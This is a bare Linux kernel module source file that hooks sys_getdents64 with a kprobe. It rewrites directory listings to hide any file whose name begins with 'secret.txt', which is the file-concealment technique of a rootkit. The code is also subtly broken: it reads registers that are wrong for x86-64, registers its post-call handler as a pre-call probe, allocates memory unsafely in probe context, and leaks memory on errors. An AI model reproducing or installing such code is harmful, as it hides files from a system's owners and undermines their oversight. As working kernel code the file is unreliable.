#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/kprobes.h>
#include <linux/slab.h>
#include <linux/dirent.h>
#include <linux/uaccess.h>

#define FILE1 "secret.txt"

MODULE_LICENSE("GPL");
static void getdents_post_handler(struct kprobe *p, struct pt_regs *regs, unsigned long flags) {
    long nread;
    struct linux_dirent64 __user *dirent;
    char *kbuf;
    long bpos;
    long new_nread;
    struct linux_dirent64 *d;
    nread = regs->ax;
    dirent = (struct linux_dirent64 __user *)regs->bx;
    printk(KERN_INFO "nread = %ld", nread);
    kbuf = kmalloc(nread, GFP_KERNEL);
    if (!kbuf) return;
    if (copy_from_user(kbuf, dirent, nread)) {
        return;
    }
    bpos = 0;
    new_nread = nread;
    while (bpos < new_nread) {
        d = (struct linux_dirent64 *)(kbuf + bpos);
        
        if (strncmp(d->d_name, FILE1, strlen(FILE1)) == 0) {
            printk(KERN_INFO "vedsod");
            memmove(kbuf + bpos, kbuf + bpos + d->d_reclen, new_nread - (bpos + d->d_reclen));
            new_nread -= d->d_reclen;
            continue;
        } else {
            bpos += d->d_reclen;
        }
    }

    if (copy_to_user(dirent, kbuf, new_nread)) {
         return;
    }
    
    regs->ax = new_nread;
    kfree(kbuf);
}

static struct kprobe kp = {
    .symbol_name = "sys_getdents64",
    .pre_handler = getdents_post_handler,
};

static int __init init(void) {
    register_kprobe(&kp);
    return 0;
}

static void __exit exit(void) {
    unregister_kprobe(&kp);
}

module_init(init);
module_exit(exit);